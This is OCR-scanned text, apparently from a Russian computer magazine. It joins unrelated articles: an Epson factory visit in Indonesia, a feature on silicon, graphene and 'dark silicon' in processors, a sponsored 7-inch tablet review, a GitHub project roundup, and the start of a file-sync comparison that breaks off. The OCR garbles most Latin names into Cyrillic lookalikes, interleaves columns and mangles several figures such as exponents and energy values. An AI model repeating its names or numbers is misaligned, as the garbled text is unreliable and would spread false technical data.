домен авзу.іеі.ерзоп. 
со.ісі. В качестве тонких 
клиентов используются 
машины под управле- 
нием ѴѴіпбошз ХР. А вот 
пиццу, как заведено, 
заказывают на РНР:), 




Л юбопытно, что весь 
топ-менеджмент ЕР50М 
во всех странах до сих 
пор полностью состоит 
из японцев. Разумеется, 
речь идет только об 
управленцах высшего 
звена - главах регио- 
нальных подразделений. 





В отличие от японцев, которые работают здесь на постоянной 
основе и обеспечиваются всем необходимым за счет компании, 
местным жителям ЕРЗОЫ не предоставляет общежитие, и для 
них вопрос транспорта вполне насущная ежедневная головная 
боль. Надо сказать, что транспортная ситуация в Джакарте и ее 
пригороде просто отвратительная — многокилометровые пробки, 
которые и не снились Москве с Нью-Йорком, здесь обычное дело. 
Именно поэтому самый распространенный вид транспорта в Джа- 
карте — небольшие мотоциклы (хотя, несмотря на это, машин 
здесь достаточно, чтобы создавать перманентный транспортный 
коллапс). Ну и конечно, о правилах дорожного движения здесь не 
слышали. 



что по местным законам человек не может ра- 
ботать на одну и ту же компанию более трех лет. 
Соответственно, ротация кадров между компа- 
ниями — это вполне распространенная практика 
как у ЕР80ІМ, так и у множества других вендоров, 
чье производство расположено в Индонезии. 

На фабрике процветает мануфактура во всей 
своей красе. Каждый сотрудник выполняет толь- 
ко одну операцию, зато делает ее очень быстро 
и ловко. Скорость конвейерной ленты достаточно 
высока, и, судя по всему, нет никакой возможно- 
сти остановиться и передохнуть — лишь в строго 
отведенное время у конвейерных работников есть 
два перерыва в день по полчаса. Что делать, если 
тебе стало плохо на рабочем месте или возникла 
срочная необходимость отойти, — не совсем ясно. 



Если по каким-то причинам работа приоста- 
навливается (например, сдача смены или вне- 
штатная ситуация на конвейере), то женщины вы- 
страиваются в шеренгу, держа руки сцепленными 
за спиной, а головы — поднятыми наверх. Именно 
это и произошло, когда мы только входили на фа- 
брику. Признаться, первое впечатление, которое 
произвела эта картина, было неоднозначным. 
С одной стороны, вроде понимаешь, что это все- 
го-навсего дисциплина, но с другой — слишком 
уж напомнило поля из первой «Матрицы». 

Каждое устройство проходит конвейерный 
цикл сборки за один час. Для доставки деталей 
к ленте для сборки используются роботы. В на- 



чале каждой сборочной линии установлен тонкий 
клиент, который отображает текущий прогресс 
работы и модель собираемого устройства, а так- 
же какую-то служебную техническую инфор- 
мацию. Каждая линия выпускает около тысячи 
устройств за одну смену. Доля брака на одной 
сборочной линии не превышает 1%. 

РЕЗЮМЕ 

Возвращаясь домой из Индонезии, я размыш- 
лял: а все-таки, взлетит или не взлетит? С одной 
стороны, цены на новые «Фабрики печати» выше 
(хотя и ненамного), чем в среднем на струйные 
принтеры. С другой стороны, это не очередная 
выдумка маркетологов, пытающихся навязать нам 
новую игрушку, а необходимое решение, по сути 
продиктованное реалиями российского рынка. 
Рынка, не желающего переплачивать и ищущего 
экономию везде, где это возможно. С этой точ- 
ки зрения «Фабрика» идеально отвечает сегод- 
няшним потребностям. Скорее всего, и бюджет- 
ные, и более дорогие устройства новой линейки 
ЕРЗОЫ найдут своего потребителя (часть из них 
уже нашли, судя по устойчиво положительной 
динамике продаж), и уже через пару лет можно 
будет покупать принтер с твердой уверенностью 
в том, что домашняя фотолаборатория не ударит 
по кошельку, а будет еще долго радовать отлич- 
ными снимками за приемлемую цену. ДЕ 



Такое быстрое (всего один час) переключение конвейе- 
ра со сборки одной модели на другую вовсе не означает, 
что производство любого нового устройства ЕР50Ы можно 
организовать в столь короткий срок. Речь идет только о пере- 
ключении между уже адаптированными к производству 
моделями. Новые, только что разработанные дизайнерами 
ЕРЗОЫ устройства должны пройти многократные проверки 
на опытных образцах, прежде чем к их производству начнут 
адаптировать конвейеры. 





долларов — средняя 
зарплата рабочего 
на фабрике ЕРЗОМ, 
что по местным меркам 
довольно неплохо. 
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Переходи на темную сторону силы! 
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После выхода очередного поколения 
центральных процессоров многие 
техноманьяки задаются вполне ло- 
гичным вопросом: а что будет даль- 
ше? Каковы перспективы развития 
микроэлектроники, ведь невозможно 
постоянно «утоньшать» техпроцесс 
и увеличивать тактовую частоту? Рано 
или поздно перед кремниевыми чи- 
пами появится непреодолимый порог 
и придется внедрять что-то принци- 
пиально новое. Естественно, ученые 
всего мира уже давно озадачились 
этими вопросами. И некоторые техно- 
логии внедряются уже сейчас. О них 
и пойдет речь. 



Соге І7-4770К без людей в белых халатах данный стержень проходит ряд химико- 

геплораспредели- физических процедур, обусловленных конкретными свойства- 

телы й крышки ми полупроводника. Если раньше изготавливали пластины диа- 

метром 200 и 300 мм, то на сегодня распространена технология 
450-миллиметровых кремниевых заготовок. Именно обработка 
полупроводника определяет, какая часть будущего процессора 
станет проводником, пропускающим ток, либо изолятором, со- 
ответственно, не пропускающим ток. 

Далее необходимо из одной такой пластины сделать хотя бы 
несколько сотен процессоров с несколькими сотнями миллио- 
нов транзисторов, заполненных в специальных местах прово- 
дниками из различных металлов из нижней части таблицы Мен- 
делеева (выбор зависит от редкости, дороговизны и свойств 
элемента). 



ДЕНЬ ВЧЕРАШНИМ 

В конечном итоге Іпіеі столкнется с проблемами, касающимися 
дальнейшего выполнения закона Мура. И связаны они с раз- 
мером того самого транзистора и способностью кремния пере- 
жить очередное его уменьшение. Поэтому уже сегодня, подоб- 
но тому, как русские готовят сани летом, необходимо начать 
изучение новых материалов или способов улучшить имеющи- 
еся технологии (точнее, это уже делается не один год, просто 
кремний пока еще остается вне конкуренции). 

На данный момент изготовление всевозможных чипов про- 
исходит по одному алгоритму, разветвленному, в зависимости 
от сложности, на сотни мельчайших и не очень элементов, кото- 
рый совершенствуется по ходу роста потребностей общества. 
Для наглядности позволь рассказать про самые главные его 
стадии. 

Итак, для создания процессора «выращивают» цилиндр из 
чистейшего кремния, который потом нарезается на круглые 
пластины. В помещениях, где при попадании хотя бы одной 
пылинки сразу же звучит сирена, под строгим наблюдением 





Параллельно с рассказом о новых технологиях, которые так или 
иначе, но будут интегрированы в центральные процессоры, я 
бы хотел затронуть тему использования других полупроводни- 
ковых материалов. Ведь рано или поздно из кремния выжмут 
все соки. А что же будут делать дальше? 

Заменить кремний пробуют с помощью германия. Про- 
движением данного материала занимается достаточно из- 
вестная контора — АМР. Дела в последнее время у них пошли 
на поправку, так что в серьезности их намерений можешь не 
сомневаться. Но попрошу акцентировать внимание на том, что 
германий при большей производительности достаточно неста- 
бильно ведет себя уже при температурах выше 65 градусов по 
Цельсию. А потому на данный момент инженерам удалось лишь 
частично задействовать новый материал в своих процессорах 
с целью создания барьера. Дело в том, что установленные по 
краям заполненного растянутым кремнием канала герма- 
ниевые пластины (за счет более крупной кристаллической 
решетки) позволяют кремнию растягиваться — плотность полу- 
проводника уменьшается , и скорость пропускания электронов 
возрастает. 
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Полученную структуру обогащают токопроводящим по- 
ликристаллическим кремнием, а затем создают новый слой 
будущего «камня». Если ситуация требует то го, то материал на- 
сыщают ионами других веществ в процессе легирования для 
увеличения проводимости диоксида кремния. 

Именно таким способом ІпіеІ успешно осуществила выпуск 
процессоров архитектуры Запсіу Вгісіде, работающих за счет 
32-нанометровых транзисторов. Точнее, данная цифра гово- 
рит исключительно о ширине самого затвора, ибо расстояние 
между диэлектриком и транзистором меньше одного наноме- 
тра. Если учитывать, что диаметр атома кремния всего 0,24 нм, 
то приходится иметь дело с атомными расстояниями. Столь 
небольшие размеры в процессоре увеличивают интенсивность 
квантово-туннельного перехода электронов через барьер, что 
приводит к ошибкам во время переключения транзисторов из 
нуля в единицу. Поэтому от диоксида кремния пришлось отка- 
заться в пользу новейших НІ-К оксидных материалов на основе 
преимущественно гафния. 

Но проблемы окружают нас со всех сторон! К сожалению, 
инженеры столкнулись с очередной из них. Дело в том, что 
с выходом 32-нанометровых, а затем и 22-нанометровых тран- 
зисторов достигнут предел применения ультрафиолета для 
работы с фоторезистом и минимальной дифракцией (рассеи- 
ванием). Квант волны света элементарно «толще» расстояний 
между элементами на оксидной подложке, следовательно, 
и рисунка маски. 

Нашелся выход в Биде применения так называемого Эеер 
Шгаѵіоіеі (глубокий ультрафиолет) с длиной волны 193 нм в со- 
вокупности с фазовым сдвигом трафарета. Но такая головная 
А ведь можно еде- Естественно, физически достичь таких крохотных разме- боль требует не только практически идеального позициониро- 

латьвоттак! ров (речь идет о расстояниях, сравнимых с диаметром атомов вания маски относительно пластины, но и огромных вычисли- 

кремния) невозможно, поэтому создаются слои за счет шабло- тельных мощностей, тормозящих процесс изготовления чипов, 

нов с дальнейшим «наращиванием» необходимого материала Поэтому на сегодня одним из самых высокотехнологичных 

и последующим удалением лишних остатков. Но прежде чем методов является иммерсионная литография, основанная на 

что-то убрать, надо что-то создать. Поэтому на кремниевый размещении между линзой ультрафиолетового источника све- 

диск наносят светочувствительный материал, именуемый фо- та и кремниевой пластиной специальной жидкости. Состав, ко- 

торезистом. Его экспонируют на пластине с помощью трафаре- нечно же, держится в тайне. 

та-маски и засвеченные участки удаляют травлением. Данный Существует и технология ЕІ)Ѵ- лито графи и (Ехігепле Шга- 

этап изготовления СРІІ получил название фотолитографии. ѵіоіеі, экстремальный ультрафиолет) для более тонкой экспо- 

Процесс повторяют снова и снова, пока на поверхности пласти- зиции трафаретов. Длина волны у такого ультрафиолетового 

ны не останется рельефный рисунок из наращенного диоксида света всего 13 нм, что позволит избавиться от ряда проблем, 

кремния согласно архитектуре чипа. кроме одной — цены. 





Еще один материал, который может стать «преемником» кремния, — это 
графен, обладающий очень хорошими свойствами. Например, он имеет 
высокое отношение прочности к массе. По этому показателю ему нет 
равных в периодической системе Д. И. Менделеева. Теплопроводность 
графена свыше 5 • 103 Вт / (м • К). Электропроводность этого материала 
на три (!) порядка выше, чем у меди. Также графен имеет высокую под- 
вижность носителей: 2-105 см 2 / (В • с) при нормальной температуре и 
107 см 2 / (В • с) — при гелиевых температурах. Наконец, на базе графена 
можно сделать сток, исток и канал для создания полевых транзисторов. 
Причем уже сейчас есть специальные полоски толщиной всего 3 нм. 

На базе графена, кстати, уже разработаны так называемые полевые 
туннельные транзисторы — ОЫВ ТРЕТз (Огарітепе ЫапоВіЬЬопз ТРЕТ). 
Данные транзисторы способны выдержать более высокие токи возбуж- 
дения и характеризуются на несколько порядков более низкой рассеива- 
емой мощностью. В университете Нотр-Дам уже разработаны графено- 
вые нанополоски толщиной до 3 нм, затвор СЫР ТРЕТ имеет длину всего 
20 нм Ток утечки в отключенном состоянии на четыре порядка ниже, 
чем у классического МОЗРЕТ-транзистора (25 - 10 й мкА/мкм против 
0,7 мкА/мкм), а напряжение питания — на порядок (0, 1 В против 1 В). 
Переключение ОРШ ТРЕТ происходит с частотой 11 000 ГГц. Обычные 
МОП-приборы могут похвастать лишь скоростью 2000 ГГц, 

Масштабный выпуск процессоров на базе графеновых транзисто- 
ров — дело далеко не ближайшего будущего. Плюсы графена очевидны. 
Однако необходимо учесть еще один аспект — финансовый. Сколько 
будет стоить такой «камень»? Инженерам наверняка придется поломать 
над этим голову. 
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ДЕНЬСЕГОДНЯШНИЙ 

Описанная выше методика создания чипов за вычетом некото- 
рых моментов использовалась больше 50 лет. Но с выходом про- 
цессоров архитектуры Іѵу Вгісіде в Іпіеі перешли от классических 
планарных структур к трехмерным. Эта технология получила на- 
звание Тгі-Оаіе, и она позволяет и дальше выполнять закон Мура. 

Почему все так прицепились к этому закону? Все очень про- 
сто. Данный вектор развития позволяет каждые 24 месяца ста- 
бильно увеличивать производительность интегральных схем. 
Конечно же, раз число транзисторов в кристалле увеличивает- 
ся вдвое, то в теории и производительность должна удвоиться. 
Однако трудности, с которыми приходится сталкиваться ин- 
женерам и ученым, капитально «корректируют» выходной ре- 
зультат. А потому на практике очень часто выходит не так, как 
в теории. На деле «планарный» Запсіу Вгісіде не так уж и сильно 
отстает от «трехмерного» Іѵу Вгісіде. 

Любой планарный процессор можно представить в виде 
плоской структуры, на которой располагаются ячейки с тран- 
зисторами. Площадь этой структуры определяет число тран- 
зисторов, а следовательно, и производительность «камня». С 
выходом Іѵу Вгісіде ячейки стали располагать в несколько рядов. 
Появилось такое понятие, как «производительность вглубь». 
Чтобы ты понимал, насколько сложная задача стояла перед 
Іпіеі, скажем, что разработка Тгі-Оаіе-технологии велась с 2002 
года, то есть чуть меньше десяти лет, А это приличный срок для 
микроэлектроники! 

В «планарном» процессоре ток может протекать только по 
узкой поверхности проводника, И это одно из самых главных его 
ограничений. В трехмерных же структурах ток распространяет- 
ся по толще кремниевого выступа, как бы проходящего сквозь 
затвор. Эта разница позволила уменьшить сопротивление тран- 
зистора в активном состоянии, а также увеличить скорость их 
переключения. Как итог, у новых процессоров были уменьшены 
напряжение питания и токи утечки. В идеальных условиях Тгі- 
Ѳаіе-транзисторы на 40-50% производительнее обычных пла- 
нарных транзисторов. На практике же все не так радужно. 

Еще один большущий плюс Тгі-Саіе — возможность изготав- 
ливать чипы при помощи классической литографии. То есть для 
новых процессоров не надо строить новые фабрики и переос- 
нащать старые. 



ТЕМНЫЙ ВЛАСТЕЛИН 

Итак, именно создание трехмерных транзисторов, а также 
развитие схем «вглубь» (а не «вширь») позволило ІпіеІ беспре- 
пятственно перейти на 22-нанометровые «рельсы». Скажем 
больше: не за горами выход чипов, изготовленных согласно 
14-нанометровому и 10- нанометровому техпроцессу. Так- 
же ожидается появление первого центрального процессора 
с триллионом транзисторов на борту. Но не все так хорошо, 
как может показаться на первый взгляд. И очень может быть, 
что в скором будущем мы услышим историю про «паровозик, 
который не смог». Согласно закону Деннарда, при уменьше- 
нии техпроцесса в X раз производительность схемы увеличит- 
ся в X 3 раз. При этом рост вычислительной мощи не приведет 
к увеличению энергопотребления, так как на той же площади 
кристалла помещается, как мы знаем, X 2 транзисторов. Также 
в X раз должна увеличиться тактовая частота, а напряжение пи- 
тания — уменьшиться в X раз. Но в наши дни закон не работа- 
ет (вот это поворот!). И с уменьшением техпроцесса начинают 
расти токи утечки, приводящие к увеличению энергопотребле- 
ния. Уже сегодня некоторые процессоры можно считать миниа- 
тюрными ядерными реакторами. И тепловыделение в размере 
125-135 Вт у самых производительных «камней» уж точно не на- 
зовешь маленьким. 

Очевидно, что в Іпіеі стараются держаться в рамках опреде- 
ленных тепловых пакетов. Конечно, можно создать сверхмощ- 
ный процессор с ТОР порядка 200-300 Вт (как у видеокарт, на- 
пример). Однако охлаждать его придется двухкилограммовым 
кулером. Стоимость системы будет зашкаливать, а стоимость 
электроэнергии... лучше промолчим. Поэтому при выпуске но- 
вых процессоров нужно обязательно держаться определенной 
границы энергопотребления — так называемой ІЛіІігаІіоп ѴѴаІІ, 
У этого ограничения есть зависимость: с каждым новым тех- 
процессом, в отсутствие серьезных архитектурных изменений, 
доля активной площади чипа (то есть той, в которой постоянно 
идет переключение затворов транзисторов) должна убывать 
экспоненциально. Как правило, речь идет о единицах и даже 
долях процентов. Оставшаяся большая часть кристалла, ко- 
торая неактивна, получила название «темный кремний» (Эагк 
ЗІІісоп). И чтобы процессор не превышал допустимый порог 
энергопотребления, необходимо, чтобы в любой момент вре- 
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мени большая часть кристалла была отключена либо работала Фотографии мобрет- 
на пониженных частотах. транзистора и Тгі-Саіе- 

транзистора 

ЧЕТЫРЕ ПУТИ 

Уже сейчас можно смело заявить, что мы живем в эпоху «темно- 
го кремния». Инженеры разделяют четыре основных подхода, 
при которых микроэлектроника будет развиваться в эту эпо- 
ху. Это интеграция новых техпроцессов и материалов, специ- 
ализация, параллелизация и управление энергопотреблением. 

Бегло рассмотрим эти подходы: 

1. Интеграция. Уже сейчас ведутся разработки схем на базе 
более тонких технологических норм. Сюда же можно от- 
нести разработку Тп-Саіе. Хотя очевидно, что трехмерные 
транзисторы лишь отсрочат приход альтернативных техно- 
логий с использованием других полупроводниковых мате- 
риалов. Уже сейчас активно ведутся разработки над созда- 
нием чипов на базе германия и графена. 

2. Специализация. Это реализация на площади кристалла 
специальных блоков (сопроцессоров), которые, в зави- 
симости от конкретной задачи, либо намного производи- 
тельнее процессора общего назначения, либо во сто крат 
энергоэффективней. Уже сейчас существуют специальные 
сопроцессоры, позволяющие на аппаратном уровне об- 
рабатывать графику, кодировать видео и звук, И пока один 
сопроцессор выполняет задачу, другие могут быть попросту 
отключены. Конечно же, самым наглядным примером ис- 
пользования специализации являются ЗоС-схемы. Взгляни 
на картинку микропроцессора Іпіеі МесКіеІсІ, используемого 
в смартфонах Міпі первого поколения. В нем уже располо- 
жены встроенные энкодеры/декодеры видео, которые акти- 
вируются только по мере необходимости. 

3. Параллелизация. Многие задаются вопросом, почему 
при освоении новых технологических норм ІпіеІ не спешит 
наращивать мощь своих процессоров за счет увеличения 



количества ядер? Ответ прост: всему виной токи утечки, 
которые постоянно растут из-за того, что при определен- 
ной площади кристалла площадь ядер становится все 
меньше. Площадь кристалла вряд ли в ближайшее время 
сильно уменьшится. Поэтому в Ідіеі обращают внимание 
на другие составляющие процессора. Например, замена 
одного компаратора на два, но работающих на вдвое мень- 
шей частоте, позволяет уменьшить энергопотребление 
в 2,5 раза! 

4. Управление энергопотреблением. Помимо термина 
«темный кремний», существует понятие «тусклый крем- 
ний» (Оіт Зііісоп). Это та часть схемы, которая не без- 
действует, но работает на значительно меньшей частоте. 
Самый яркий пример использования «тусклого кремния» — 
это использование технологии ТигЬо Воозі. Рассказывать 
о ней в подробностях нет смысла. Второй момент — уве- 
личение кеша. А именно предлагается использовать «тем- 
ные» области кремния для размещения кеша. В итоге для 
ряда задач появится возможность уменьшить число кеш- 
промахов. 



ВЫВОД 



Существует еще достаточно много методик и технологий, по- 
зволяющих микроэлектронике развиваться в эпоху «темного 
кремния». Так что как минимум до 2020 года мы будем лицез- 
реть привычную нам картину. Скорее всего, закон Мура будет 
действовать и дальше, а технологические нормы разработки 
СРЫ — совершенствоваться и совершенствоваться. Однако 
в перспективе, глобально, если мы возьмем временной отре- 
зок в два-три десятилетия, очевидно, что микроэлектронике, 
какой мы знаем ее сегодня, приходит конец. И совсем скоро 
мир будет стоять на распутье. Либо человечество загонит себя 
в технологический тупик, либо, наоборот, произойдет самая на- 
стоящая Ні-Тесб-революция! ЭС 



Есть еще один тип туннельного транзистора на базе графена — двухслойный псев- 
доспиновый полевой транзистор ВіЗРЕТ (Вііауег Рзеибозріп РЕТ), разработанный 
учеными Техасского университета. Основой этого транзистора служит структура, 
состоящая из двух монослоев графена, разделенных тонким слоем диэлектрика. 
Степень свободы каждого монослоя рассматривается как псевдоспин (спин — это 
собственный момент импульса элементарных частиц) ферроэлектрика. 

Сама по себе технология очень заумная. Очень! Главное, что уже сейчас раз- 
работана схема, которая на частоте 100 ГГц потребляет за такт переключения тран- 
зистора 10-20 Дж энергии. Современные МОП-транзисторы потребляют порядка 
5 • 10 10 при частоте 5 ГГц. Так что двухслойные псевдоспиновые транзисторы могут 
похвастать сверхвысокой энергоэффективностью. 

В общем, мировые аналитики считают графен главным претендентом, который 
впоследствии может сменить кремний. Мы же с удовольствием проследим за тем, 
как будет происходить самая настоящая полупроводниковая революция! 
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ОПІН 



Почта 



Операционная система: АгкЛгоісІ 4.2 
Дисплей: 7", 1280x 800, 16:10 
Система на чипе: МТК8389, 1,2 ГГц, 
четыре ядра 
НАМ: 1 Гб, РОРЗ 
Встроенная память: 8 Гб 
Поддержка карт памяти; тісгоЗР, 
до 32 Гб, не выше 6-го класса 
Камеры: 0,3 Мп (фронтальная), 

2 Мп (тыловая) 

Аккумулятор: ІТроІ, 3500 мА • ч 
Беспроводные сети: ѴѴі-Рі 802.11 Ь/д/п, 
ВІийообі, 36 

Разъемы: тісгоІІЗВ, 3,5 мм (мини-джек), 
слот тісгоЗР, 31 М 
Габариты: 189 х 115 х 9,7 мм 
Вес: 303 г 

Комплектация: планшет, кабель 0Т6 
(115В — тісгоІІЗВ), кабель ІІЗВ, 
зарядное устройство, чехол 



Вале ди я 






Настройки 

М 



'Погода 



Файловые 






Деньги 



г 



ЕчСдІЧѴ^И 1 






| | и I а г" Р^И аЯ 






т:<т % т г л : 5 



Александр Расмус 



о момент я окончательно пере- 
стал понимать, зачем вообще нужны 
большие 10-дюймовые планшеты, 
маю, что у меня какие-то особен- 
< что, возможно, ты со мной 
Отказаться от ноутбука пол но - 
но, и если планшет нужен 
р в метро, то вес будет иметь зна- 
іение. Опять-таки для общественного транспорта 
компактное устройство, которое можно держать 

— это успех. 

тывать особенности АпсІгоісІ. 
ение экрана почти у всех мо- 
матное, поэтому при чтении 
в вертикальном режиме 10-дюймовый планшет 
превращается в эдакую «колбасу», а 7-дюймо- 
вый аппарат остается удобным. Ну и не стоит за- 

ных приложений для АпсІгоісІ 
по-прежнему мало, — Ооодіе только этой осенью 

діе РІау нормальный раздел, 
фонные программы на малень- 
все-таки получше. 

Планшет от Віітіх прекрасно вписывается 
этот тренд. Очень легкий (около 300 г), тонкий 
(9,7 мм), устройство очень хорошо лежит в руке. 



Ж •ііатцдщціііг 






Ж Л ІСІ ! т я т н й | 



Разрешение 7-дюймового экрана составляет 
1280 на 800 точек, выполнен он по технологии 
ІР5. Объем встроенной памяти составляет 8 Гб, 
но предусмотрен разъем для карточек плісгоЗО. 

У ВМО-758 довольно неплохая комплектация. 
В коробке ты найдешь чехол с магнитной за- 
щелкой, зарядное устройство, кабель тісгоІІЗВ 
на обычный ГІЗВ и переходник ІІЗВ — ОТО. По- 
следнее означает, что планшет может записывать 
данные не только на карты памяти, но и на К5В- 
флешки и внешние жесткие диски. 

Внутри также много интересного. Четырехъ- 
ядерный процессор МТК8389 работает на часто- 
те 1,2 ГГц. Объем оперативной памяти состав- 
ляет один гигабайт. Версия предустановленного 
АпсІгоісІ — 4.2. Как и следует ожидать от такой на- 
чинки, все работает очень быстро. Загрузка план- 
шета, запуск приложений и переключение между 
ними происходит достаточно резво. 

Таким образом, НМЮ-758 очень хороший 
бюджетный вариант. Планшет с четырехъядер- 
ным процессором, поддержкой 30 и неплохим 
комплектом аксессуаров (чехол и переходник 
для внешних дисков) за 6750 рублей — это очень 
достойно. ІНІ 



На правах рекламы 
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Анатолий Ализар 




Самые 

релизы 



интересные 
на СігНиЬ 



Каждый день на ОііНиЬ появляются сотни новых проектов. Этот ресурс 
превратился в мощный центр разработки Ореп Зоигсе, главное место общения 
программистов. Посмотрим на несколько интересных новинок. 



ггее-ргодгаттіпд-Ьоокз 



ТехіГеазег 



поо.пІ/9№№7? 

Подборка бесплатных электронных книг по программиро- 
ванию. Список сперва начали пополнять на ЗіаскОѵегПоѵѵ — 
еще одном популярном программистском сайте. Переезд 
на ѲііНиЬ позволит легче редактировать список: здесь 
удобнее делать форки и коммиты. 



Алгоритм автоматического сокращения текстов до небольшой 
аннотации. Очевидные применения — новостные ленты, глав- 
ные страницы блогов и других контент-площадок. Естественно, 
работает только на английском. Демо: іехИеазег.сот . про- 
граммные интерфейсы: аоо.дІ/іарРрл 



коѵё и&т ор рвооріаммімо ѳоокб 

І.і$і оНгее рго^гаттіпд Ьоокз 

ТНв іі«$ іпіііцііу ѵхм а сіопе оі ■ іта сМгте'у яѵді іЬк • д : Ьу Сдоде Зіоскѳг. 

СопкпЬи*е іо Узі оп СіШиЫ 

Ьу ѵ ' ; ■■ ( 5 бауз, 16 і^ои^з адо | іэ гэем 

Іпсіех 

а а. д-і_, я ; _ +г , 



ТехІТеазег 



$иітппагі2е аггіс^ іпяэщіу Ьу иііпд Тех*Т>а$ег Ѳооктагкіег 



<і - Ц** ЬіЛят 



ТргіТ**рсг 



>п рпиг аоакгп^-кі Счг. 



АПісІе 



ічіШчтй 



АІдогііЬш АН Созіасі 



ТмяТвК^Г ісѵ*. А 5 ( 4 ^ -V 

аідс Таг-пиілігй 
[Л№(К 1 ГМІЛСІ 1 19 
іияппнііГіК’ 4 і“исІ*і . 



Т(і* АРГ ІКѢСІ ЙЭГ тодаНгліогч. 

йэйупгп'лі ап ійп &г йс-ічглісЗ т-мапГе, № 
Тоипй И Ьиіігч-м іоІиЦоп с? 

1 гу іе п*и: ГвдТыиг, «пиіі п* л 



СЬеск оіл Нет темТеамг імгГоггпь кг» ьЬ&и ■ . 

Вэто** I АіинЛ I АИ I Вод | СопГлй 

О КЙЗ теНГыз» 



ОЛотеІег 



РиІІ Зсгееп М агіо 



доо.ді/дѴѴМрСЕ 

ОаѵаЗсгірІ- и СЗЗ-библиотека для визуальных эффектов 
с плавным переходом от одной цифры к другой. Внешний вид 
цифр можно менять при помощи подключаемых тем (сейчас 
их шесть). Злоупотреблять этим эффектом все-таки не стоит, 
так как при загрузке добавляется около 10 килобайт. Демо 
и документация: аіШиЬ.ИиЬзроІ.сот/оботеІег . 




ТиІІзсгеептапо.сот 

Римейк популярной в прошлом игры Зирег Магіо ВгоІИегз, 
но теперь на НТМ1_5, с отличным качеством графики и с под- 
держкой полноэкранного режима. На данный момент игра 
работает только в браузере Соодіе Сбготе, 
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5 ЫІМТЕЫОО 
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Просто блоі 





V 









Сдріоі 



Подкласс ІЛТехІРіеІсІ для разработки ЮЗ-приложений, 
который меняет внешний вид текстового поля при его 
заполнении, Удобно, например, когда в поле есть изна- 
чальная подсказка — ріасебоісіег. Демо: сю о.аІ/ХкаиіС 



сюо.аІ/ЦгСЖЫ 

Модуль для построения графиков из набора числовых 
данных, создан по образцу ддрІоі2, но на языке 
РуШоп, а не В. Доступен для ѴѴіпсІоѵѵз, І_іпих и Мае 
{через Ііотебгеѵѵ), а также в виде рір- модуля. 




Огоргопе 



ЗіаскЕсІіі 



аоо.аІ/аОсІТтІ 

Маленькая библиотека Заѵабсгірі:, которая превраща- 
ет НТМІ_- элемент в «дроп-зону», куда пользователь 
может перетянуть файлы мышкой — и они загру- 
зятся на сервер. Начиная с версии 2.0.0 библиотека 
не нуждается в іОиегу. Поддерживает пред просмотр 
изображений и красивые индикаторы загрузки. 



аоо 



*1 /03 


гѵ 


П/Оз 


X. 



и 



Браузерный Маг кбоѵѵп -редактор, основанный 
на РадеОоѵѵп. Может хранить документы либо 
в локальном хранилище браузера, либо в облачном 
диске йгорбох или Ооодіе Огіѵе. Умеет публиковать 
тексты в популярных блог-движках или в виде дізі- 
файлов. 
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ИІН 

В июньском номере за этот 
год мы делали очень 
подробный обзор различ- 
ных Магкбоѵѵп -движков, 
так что нельзя сказать, 
что у Ѳбозі совсем нет 
аналогов. Если говорить 
о красивых блогохостин- 
гах, то можно вспомнить 
о 5сгір1:одгат { зегіріоаг.апп к 
Для загрузки постов в этот 
сервис можно использовать 
йгорЬох, в который нужно 
положить посты в формате 
Магкбоѵѵп. Сервис также 
поддерживает адаптивную 
верстку. 

Более простой ва- 
риант — сервис Саіеріп 
( саіеріп.со ). Для загрузки 
постов также использует 
ОгорЬох, для оформле- 
ния — Магкбоѵѵп. В отличие 
от Зсгіріодгат, тут нет 
тем оформления и веб- 
интерфейса. В основе — 
движок Реіісап, установку 
и настройку которого мы 
разбирали в той же статье. 
Среди подобных решений 
это самый функциональный 
вариант, но и самый слож- 
ный в настройке и уста- 
новке. 

Однако ни один из этих 
сервисов и движков 
не подходит для совмест- 
ной работы над текстами, 
а для аналитики в лучшем 
случае можно использовать 
Соодіе Апаіубсз. В этом 
плане у СИозІ огромное пре- 
имущество. 



Самым интересным релизом в этой подборке 
можно считать СИозІ:. Разработчики этого бло- 
годвижка настаивают на том, что, в отличие 
от ѴѴогбРгезз, они делают специализированный 
продукт, а не полноценную СМ5. 

Опрос пользователей показал, что большин- 
ство людей фактически используют ѴѴогбРгезз 
как полноценную систему управления контентом 
(СМ5), а не как обычный блог. Сам Мэтт Мюллен- 
вег, основатель и ведущий разработчик проекта, 
давно обратил на это внимание и анонсировал 
выход «радикально упрощенного ѴѴогсІРгезз» где- 
нибудь в будущем. Но его опередили. 

Интересно, что основатель проекта — 
Джон О’Нолан, бывший руководитель группы 
по разработке пользовательских интерфейсов 
в ѴѴогсІРгезз. В отличие от своего главного кон- 
курента, Сбозі — некоммерческий проект. День- 
ги на разработку были получены на КіскзІаПег, 
всего было пожертвовано более 300 тысяч дол- 
ларов. 



Тем не менее модель монетизации у СІіозі 
очень похожа на ѴѴогсІРгезз. Движок блога будет 
распространяться бесплатно, и для него доступ- 
ны исходные коды, но разработчики также будут 
предлагать и размещение блогов. 

На самом деле для тех, кто следит за темой 
блогодвижков, нового здесь не очень много. 
Поддержка Магкбоѵѵп, минималистичный ин- 




терфейс написания блогов и управления за- 
писями, адаптивные шаблоны для блогов под 
любые устройства. Интерес представляют функ- 
ции коллективной работы и удобный дашборд 
со статистикой. Так что продукт будет интере- 
сен небольшим редакциям, для которых сейчас 
ѴѴогсІРгезз точно является единственным реше- 
нием. ЗС 
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Выбираем решение для 
персонального файлохранилища 



Поздравляю, тебе досталась, возможно, 
первая в мире статья, в которой системы 
персонального файлохранилища, развора- 
чиваемые на домашних серверах и ЫАЗ’ах, 
не называют «персональным облаком». 

На этом радости не заканчиваются — мы 
сравним лучшие продукты этого класса. 

В качестве бонуса мы поговорим о не- 
скольких интересных устройствах, на базе 
которых можно все это богатство развора- 
чивать с максимальным комфортом. 



) 

Александр Лыкошин 

аМовЫпСЭотаіІ.сот . 

Іідпе.гц 



пь 






ВІТТОВЕЫТ 5 УМС 



В ВИТоггепІ Зупс используется подход, принци- 
пиально отличный от других систем. Синхрони- 
зация построена на основе децентрализованно- 
го протокола реег-іо-реег. Если файл доступен 
сразу на нескольких устройствах, они могут пе- 
редавать его одновременно, достигая при этом 
максимально возможной скорости. 

Для начала синхронизации каталога необходи- 
мо через веб- интерфейс указать каталог и сгене- 
рировать для него секретный 20-байтный ключ, ко- 
торый одновременно и определяет права доступа 
(ключ может давать полные права или права толь- 
ко на чтение, при этом синхронизация с другими 
устройствами будет односторонней), и уникально 
идентифицирует этот каталог. На другом устрой- 
стве с установленным ВИТоггепІ Зупс теперь не- 
обходимо выбрать локальную папку и указать этот 
код (на мобильном устройстве можно отсканиро- 
